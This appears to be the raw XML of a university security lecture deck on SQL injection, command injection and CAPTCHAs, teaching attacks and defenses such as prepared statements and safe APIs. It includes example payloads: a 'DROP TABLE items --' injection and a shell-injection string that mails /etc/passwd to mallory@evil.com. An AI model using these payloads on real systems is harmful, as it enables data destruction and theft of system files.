            <a:ext cx="3388350" cy="1525200"/>
            <a:chOff x="5348650" y="3048550"/>
            <a:chExt cx="3388350" cy="1525200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="412" name="Google Shape;412;p49"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5788300" y="3048550"/>
              <a:ext cx="29487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This is essentially OR TRUE, so returns every item!</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="413" name="Google Shape;413;p49"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="412" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5348650" y="3664150"/>
              <a:ext cx="1914000" cy="9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 (Again)</a:t>
            </a:r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1220400" y="1655725"/>
            <a:ext cx="6703200" cy="1262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SELECT item, price FROM items WHERE name =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https://vulnerable.com/get-items?item=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DROP TABLE items --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424" name="Google Shape;424;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="315625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1220400" y="41335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2347975" y="2571750"/>
            <a:ext cx="3504900" cy="2001900"/>
            <a:chOff x="2347975" y="2571750"/>
            <a:chExt cx="3504900" cy="2001900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="427" name="Google Shape;427;p50"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2347975" y="2571750"/>
              <a:ext cx="3504900" cy="1046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 this payload: End the first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"/>
                <a:t>), then start a new statement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DROP TABLE items</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>), then comment out the remaining quote (</a:t>
              </a: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--</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="428" name="Google Shape;428;p50"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="427" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4100425" y="3618450"/>
              <a:ext cx="963600" cy="95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434" name="Google Shape;434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 injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>): Injecting SQL into queries constructed by the server to cause malicious behavior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caused by using vulnerable string manipulation for SQL queries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the attacker to execute arbitrary SQL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Modify records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records/tables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anything that the SQL server can do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Exploits of a Mom</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Google Shape;44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42" name="Google Shape;442;p52" descr="Exploits of a Mom" title="Her daughter is named Help I'm trapped in a driver's license factory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687925"/>
            <a:ext cx="63436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Roadside SQLi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Google Shape;44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588" y="1148375"/>
            <a:ext cx="5326833" cy="39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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Google Shape;4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56" name="Google Shape;456;p5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SQL queries are used in a way that is visible to the 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Visible: Shopping carts, comment threads, list of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Blind: Password verification, user account creation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SQL injection vulnerabilities only return a true/false as a way of determining whether your exploit worked!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Blind SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: SQL injection attacks where little to no feedback is provided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Attacks become more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>annoying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, but vulnerabilities are still exploitable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Automated SQL injection detection and exploitation makes this less of an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will use automated tools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62" name="Google Shape;462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SQL Injection Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Google Shape;463;p5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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An automated tool to find and exploit SQL injection vulnerabilities on web servers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pretty much all database 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blind SQL injection (even through timing side channels)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“escaping” from the database server to run commands in the operating system itself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Takeaway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: “Harder” is harder only until someone makes a tool to automate the attack</a:t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 t="50731"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486325" y="3030250"/>
            <a:ext cx="3498101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25" y="1848133"/>
            <a:ext cx="3498100" cy="118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Clickjacking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1" name="Google Shape;471;p5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Input sanitization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#1: Disallow special characters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 #2: Escape special characters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XSS, SQL injection relies on certain characters that are interpreted specially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SQL allows special characters to be escaped with backslash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/>
              <a:t>) to be treated as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Difficult to build a good escaper that handles all edge cases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should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>never</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> try to build one yourself!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as a defense-in-depth measure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Google Shape;47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73" name="Google Shape;473;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3524325"/>
            <a:ext cx="6703200" cy="141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= sqlEscape(itemName)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:= fmt.Sprintf(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"SELECT name, price FROM items WHERE name = '%s'", itemName</a:t>
            </a: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db.QueryRow(query)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79" name="Google Shape;479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Prepared statements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represented as a question mark (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) when writing SQL statements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Instead of trying to escape characters before parsing, parse the SQL first, then insert the data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the parser encounters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/>
              <a:t>, it fixes it as a single node in the syntax tree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After parsing, only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, it inserts data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untrusted input never has a chance to be parsed, only ever treated as data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp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81" name="Google Shape;481;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3524325"/>
            <a:ext cx="6703200" cy="1108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handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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db := getDB()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row, err := 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db.QueryRow("SELECT name, price FROM items WHERE name =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itemName</a:t>
            </a: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00" b="1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Defenses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Biggest downside to prepared statements: Not part of the SQL standard!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Instead, SQL drivers rely on the actual SQL implementation (e.g. MySQL, PostgreSQL, etc.) to implement prepared statements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rely on the API to correctly convert the prepared statement into implementation-specific protocol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Again: Consider human factors!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;48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494" name="Google Shape;49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500" name="Google Shape;50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Untrusted data being treated incorrectly is not a SQL-specific problem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happen in other languages too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function in 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function takes a string as input, spawns a shell, and executes the string input as a command in the shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp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07" name="Google Shape;50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weaver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12" name="Google Shape;512;p61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13" name="Google Shape;513;p61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3407900" y="2207800"/>
            <a:ext cx="2253600" cy="1307400"/>
            <a:chOff x="3407900" y="2207800"/>
            <a:chExt cx="2253600" cy="1307400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="515" name="Google Shape;515;p61"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3407900" y="3115000"/>
              <a:ext cx="22536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String manipulation again!</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="516" name="Google Shape;516;p61"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="515" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="4218200" y="2207800"/>
              <a:ext cx="316500" cy="90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 Injection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23" name="Google Shape;523;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="95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find_employee(char *regex) {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char cmd[512];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snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);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system(cmd);</a:t>
            </a:r>
            <a:endParaRPr sz="1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1220400" y="4533775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grep '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' phonebook.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1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1220400" y="3556450"/>
            <a:ext cx="6703200" cy="338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regex = "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'; mail mallory@evil.com &lt; /etc/passwd; touch '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1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220400" y="12555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1220400" y="3156250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sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Google Shape;528;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="18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Command Injection in General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Input sanitization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before, this is hard to implement and difficult to get 100% correct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lang="en" b="1"/>
              <a:t>Use safe APIs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general, remember the KISS principle: Keep It Simple, Stupid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, executing a shell to execute a command is too powerful!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Instead, use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, which directly executes the program with arguments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>without parsing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programming languages have safe APIs that should be use instead of parsing untrusted input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/>
              <a:t> (unsafe) and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execv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (safe) in C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os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (unsafe) and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subprocess.run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (safe) in Python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exec.Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (safe) in Go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 only has the safe version!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Say it with me: Consider human factors!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are for Humans</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="Google Shape;547;p6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are designed for human usage, not robot usage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 login page is for users to submit their password, not for an attacker to automate a brute-force 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access of websites can lead to attacks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Denial of service: Overwhelming a web server by flooding it with requests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We’ll see more denial-of-service later in the networking unit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specific exploitation (e.g. scalping tickets/graphics cards when they go on sale)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="Google Shape;54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Phishing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Definition</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Google Shape;554;p6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CAPTCHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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“Completely Automated Public Turing test to tell Computers and Humans Apart”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called a “reverse Turing test”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distinguish web requests made by humans and web requests made by robots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Usage: Administer a CAPTCHA, and if it passes, assume that the user is human and allow access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Google Shape;55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Examples</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p6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distorted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Listening to an audio clip and typing out the words spoken</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Google Shape;56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75" y="1318450"/>
            <a:ext cx="3053225" cy="135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413" y="2774869"/>
            <a:ext cx="2826557" cy="199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70" name="Google Shape;570;p6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sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Google Shape;571;p6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CAPTCHAs have another purpose: Training machine learning algorithms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often requires manually-labeled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crowdsource human power to help manually label these big datasets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Machine vision problems require manually-labeled examples: “This is a stop sign”</a:t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73" y="1490825"/>
            <a:ext cx="2037451" cy="29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78" name="Google Shape;578;p6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 and Machine Learning</a:t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25" y="1276400"/>
            <a:ext cx="37719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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="364550" y="4413650"/>
            <a:ext cx="358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Takeaway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Modern CAPTCHAs are used to train machine learning algorithms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86" name="Google Shape;586;p7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Issues</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="Google Shape;587;p7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Arms race: As computer algorithms get smarter, CAPTCHAs need to get harder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Accessibility: As CAPTCHAs get harder, not all humans are able to solve them easily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Ambiguity: CAPTCHAs might be so hard that the validator doesn’t know the solution either!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bots are bad: CAPTCHAs can distinguish bots from humans, but not good bots from bad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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>Crawler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bots help archive webpages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38" y="1463125"/>
            <a:ext cx="1843650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272" y="3602047"/>
            <a:ext cx="2847375" cy="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788" y="2680685"/>
            <a:ext cx="2596349" cy="9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413" y="4415728"/>
            <a:ext cx="22311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97" name="Google Shape;597;p7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Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Google Shape;598;p7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Outsourcing attack: Pay humans to solve CAPTCHAs for you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only verify that there is a human in the loop; everything else can be automated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costs a few cents per CAPTCHA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CAPTCHAs end up just distinguishing which attackers are willing to spend money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Remember: Security is economics!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="599" name="Google Shape;5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00" y="1887079"/>
            <a:ext cx="2445075" cy="24850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0" name="Google Shape;6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574" y="1907063"/>
            <a:ext cx="2722424" cy="2445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606" name="Google Shape;606;p7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Injection: Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="Google Shape;607;p7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servers interact with databases to store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servers use SQL to interact with databases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injection: Untrusted input is used as parsed SQL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construct their own queries to run on the SQL server!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Blind SQL injection: SQLi with little to no feedback from the SQL query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Input sanitization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Difficult to implement correctly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Prepared statements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 only ever treated as data; bulletproof!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injection: Untrusted input is used as any parsed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Keep it simple and use safe API calls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613" name="Google Shape;613;p7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CAPTCHAs: Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="Google Shape;614;p7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CAPTCHA: A challenge that is easy for a human to solve, but hard for a computer to solve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Reading distorted text, identifying images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purpose: Distinguishing between humans and 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Forces the attacker to spend some money to solve the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Modern purpose: Providing training data for machine learning algorithms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computer algorithms get smarter, CAPTCHAs get harder, and not all humans are able to solve them easily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Ambiguity: CAPTCHAs might be so hard that the validator doesn't know the solution either!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Economics: Breaking CAPTCHAs just costs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bots are bad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Bonus Slides: SQL Injection Demo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="Google Shape;620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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="28932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Google Shape;626;p75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7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1: what does the SQL interpreter see?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Google Shape;628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629" name="Google Shape;6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SQL Injection and CAPTCHAS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 of modern web services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injection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CAPTCHAs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Subverting CAPTCHAs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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="28932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76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1: what does the SQL interpreter see?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Google Shape;637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638" name="Google Shape;6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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="402285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7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7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46" name="Google Shape;64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647" name="Google Shape;6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54" name="Google Shape;654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655" name="Google Shape;6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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7156550" y="465100"/>
            <a:ext cx="1666800" cy="2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7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97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Step 2: what do we want the SQL interpreter to see?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="Google Shape;662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663" name="Google Shape;6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50"/>
            <a:ext cx="7004150" cy="2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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="394665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VALUES ('123', 'toilet paper'), ('123', 'toilet paper'),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('123', 'toilet paper'), ... ('123', 'toilet paper')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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="1150600"/>
            <a:ext cx="8583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('123', 'toilet paper'), ('123', 'toilet paper'),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paper')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8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3: compare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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="1150600"/>
            <a:ext cx="8583900" cy="4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8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3: compare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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280050" y="1150600"/>
            <a:ext cx="8583900" cy="4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SQL interpreter sees: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____________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sessionToken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want the SQL interpreter to see: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INSERT INTO cart (session, item)</a:t>
            </a:r>
            <a:b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VALUES ('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sessionToken =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item = </a:t>
            </a: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toilet paper'), ('123', 'toilet paper'),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('123', 'toilet paper'), ... ('123', 'toilet paper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8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step 4: ???   step 5: profit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6" name="Google Shape;116;p23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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 17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23" name="Google Shape;123;p24"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="412300" y="123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{CC577D0C-167A-49ED-8727-562A38F614A0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5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Rank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ID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Name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Score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[8]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[9]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[10]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[11]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[12]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[13]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[14]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[15]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[16]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[17]</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="1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L="91425" marR="91425" marT="27425" marB="27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Web Services</a:t>
            </a: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websites need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>store and retrieve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User accounts, comments, prices,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HTTP server only handles the HTTP requests, and it needs to have some way of storing and retrieving persisted data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4620</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>995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Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>CS 161</vt:lpstr>
      <vt:lpstr>SQL Injection and CAPTCHAs</vt:lpstr>
      <vt:lpstr>Last Time: XSS</vt:lpstr>
      <vt:lpstr>Last Time: XSS Defenses</vt:lpstr>
      <vt:lpstr>Last Time: Clickjacking</vt:lpstr>
      <vt:lpstr>Last Time: Phishing</vt:lpstr>
      <vt:lpstr>Today: SQL Injection and CAPTCHAS</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Top 25 Most Dangerous Software Weaknesses (2020)</vt:lpstr>
      <vt:lpstr>Structure of Web Services</vt:lpstr>
      <vt:lpstr>Structure of Web Services</vt:lpstr>
      <vt:lpstr>Databases</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>SQL: SELECT</vt:lpstr>
      <vt:lpstr>SQL: SELECT</vt:lpstr>
      <vt:lpstr>SQL: SELECT</vt:lpstr>
      <vt:lpstr>SQL: SELECT</vt:lpstr>
      <vt:lpstr>SQL: WHERE</vt:lpstr>
      <vt:lpstr>SQL: WHERE</vt:lpstr>
      <vt:lpstr>SQL: WHERE</vt:lpstr>
      <vt:lpstr>SQL: INSERT INTO</vt:lpstr>
      <vt:lpstr>SQL: INSERT INTO</vt:lpstr>
      <vt:lpstr>SQL: UPDATE</vt:lpstr>
      <vt:lpstr>SQL: UPDATE</vt:lpstr>
      <vt:lpstr>SQL: DELETE</vt:lpstr>
      <vt:lpstr>SQL: DELETE</vt:lpstr>
      <vt:lpstr>SQL: CREATE</vt:lpstr>
      <vt:lpstr>SQL: CREATE</vt:lpstr>
      <vt:lpstr>SQL: DROP</vt:lpstr>
      <vt:lpstr>SQL: DROP</vt:lpstr>
      <vt:lpstr>SQL: Syntax Characters</vt:lpstr>
      <vt:lpstr>A Go HTTP Handler (Again)</vt:lpstr>
      <vt:lpstr>A Go HTTP Handler (Again)</vt:lpstr>
      <vt:lpstr>A Go HTTP Handler (Again)</vt:lpstr>
      <vt:lpstr>A Go HTTP Handler (Again)</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Exploits of a Mom</vt:lpstr>
      <vt:lpstr>Roadside SQLi</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection Tools</vt:lpstr>
      <vt:lpstr>SQL Injection Defenses</vt:lpstr>
      <vt:lpstr>SQL Injection Defenses</vt:lpstr>
      <vt:lpstr>SQL Injection Defenses</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>system Command Injection</vt:lpstr>
      <vt:lpstr>system Command Injection</vt:lpstr>
      <vt:lpstr>Defending Against Command Injection in General</vt:lpstr>
      <vt:lpstr>CAPTCHAs</vt:lpstr>
      <vt:lpstr>Websites are for Humans</vt:lpstr>
      <vt:lpstr>CAPTCHAs: Definition</vt:lpstr>
      <vt:lpstr>CAPTCHAs: Examples</vt:lpstr>
      <vt:lpstr>CAPTCHAs and Machine Learning</vt:lpstr>
      <vt:lpstr>CAPTCHAs and Machine Learning</vt:lpstr>
      <vt:lpstr>CAPTCHAs: Issues</vt:lpstr>
      <vt:lpstr>CAPTCHAs: Attacks</vt:lpstr>
      <vt:lpstr>SQL Injection: Summary</vt:lpstr>
      <vt:lpstr>CAPTCHAs: Summary</vt:lpstr>
      <vt:lpstr>Optional Bonus Slides: SQL Injection Demo</vt:lpstr>
      <vt:lpstr>SQL injection step 1: what does the SQL interpreter see?</vt:lpstr>
      <vt:lpstr>SQL injection step 1: what does the SQL interpreter see?</vt:lpstr>
      <vt:lpstr>SQLi Step 2: what do we want the SQL interpreter to see?</vt:lpstr>
      <vt:lpstr>SQLi Step 2: what do we want the SQL interpreter to see?</vt:lpstr>
      <vt:lpstr>SQLi Step 2: what do we want the SQL interpreter to see?</vt:lpstr>
      <vt:lpstr>SQL injection step 3: compare</vt:lpstr>
      <vt:lpstr>SQL injection step 3: compare</vt:lpstr>
      <vt:lpstr>SQL injection step 4: ???   step 5: profit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Injection and CAPTCHAs</dc:title>
  <cp:lastModifiedBy>Jian Xiang</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T02:16:47Z</dcterms:modified>
</cp:coreProperties>
</file>